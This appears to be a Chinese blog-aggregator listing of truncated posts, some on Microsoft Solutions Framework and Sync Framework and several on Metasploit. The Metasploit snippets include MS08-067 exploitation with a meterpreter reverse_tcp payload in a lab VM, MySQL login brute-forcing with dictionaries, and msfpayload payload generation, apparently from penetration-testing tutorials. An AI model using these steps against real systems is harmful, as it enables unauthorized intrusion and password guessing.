1.团队模式是否应该与具体项目相适应调整2.结对编程中,二人所长不同,单纯采取交替执行“驾驶/领航”的工作方式是否影响效率3.敏捷流程各阶段的耗时比重是怎样的4.MSF的基本原则若无法同时满足,如何取舍5.PM只能有一个人吗?如果多人会有什么影响。6.如何依据实际情况修改spec7.如何在面临多个b...
分类:
其他好文 时间:
2015-09-22 16:26:32
阅读次数:
135
1.对于MSF的团队模型,请问是团队中的哪个角色监督9项原则的实现?是否会浪费时间和精力在践行9项原则上?2.在调查用户需求和用户体验时如何让不同阶层的用户更多的参与度?3.想成为一位优秀的PM需要从哪几个方向培养自己的能力?与程序员沟通时需要注意哪些问题?4.如何确定软件的更新是否有效?更新后用户...
分类:
其他好文 时间:
2015-09-21 10:33:29
阅读次数:
145
还是那句话,努力(第一位)+方法(第二位)。 这段时间,我一直在寻找属于我自己的方法,我也想大踏步地向前迈进,可效率总是不高= =。 先说书吧,什么破书《MSF渗透测试指南》(只是对于我来说= =),上面就只是光讲命令,别的很少涉及,几乎完全不说渗透过程,真的是限制住了我的思路,但还好有一本...
分类:
其他好文 时间:
2015-09-20 06:52:46
阅读次数:
226
拓扑环境:2台虚拟机,一台Kali,另一台有ms08067漏洞的XP或2000或2003机器msfconsole进入msf控制台输入searchms0-067找到相应模块useexploit/windows/smb/ms08_067_netapi使用相应模块setPAYLOADwindows/meterpreter/reverse_tcp设置反弹连接showoptions查看设置选项setRHOST1..
分类:
Web程序 时间:
2015-09-19 06:23:28
阅读次数:
254
下面这个方式是普适的,但缺点就是必须要有自己的用户名和密码字典。其原理就是用user.txt与pass.txt的两个文本去不停交叉验证。msf auxiliary(mysql_login) > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(...
分类:
数据库 时间:
2015-08-11 17:41:05
阅读次数:
426
黑客攻击的方式思路是先搜集信息,定位漏洞,然后针对不同的漏洞采用不同的方式来黑掉你。下面用metasploit模拟一次跨站脚本攻击(黑掉自己的手机)。1.搜集信息msf > search androidMatching Modules================ Name ...
分类:
移动开发 时间:
2015-08-11 00:03:42
阅读次数:
306
Microsoft Sync Frameworks简称MSF,是一个综合的同步平台,MSF支持应用程序,服务,设备的在线以及离线同步。MSF主要有以下几个部件组成: * Sync Services for ADO.NET: 同步ADO.NET的数据 * Sync Services for Fee.....
分类:
其他好文 时间:
2015-07-10 02:08:35
阅读次数:
148
msfpayload命令帮助msfpayload-h列出所有可用的攻击载荷msfpayloadwindows/meterpreter/bind_tcpO列出所有windows/meterperter/bind_tcp下攻击载荷的配置项(任何攻击载荷都是可以配置的)msfpayloadwindows/meterpreter/bind_tcpO.创建一个meterperter的reverse_tcp攻击载荷,..
分类:
其他好文 时间:
2015-06-05 00:54:17
阅读次数:
2488
坏字符过滤 使用msf generate模块来过滤...
分类:
其他好文 时间:
2015-04-25 18:26:43
阅读次数:
238
kali使用metasploit开启数据服务:首先,初次使用系统要初始化建立数据库msf3,否则的话 /opt/metasploit/apps/pro/ui/config/databse.yml不存在:/etc/init/metasploit start查看postgres是否启动:netstat ...
分类:
数据库 时间:
2015-04-25 16:33:45
阅读次数:
325
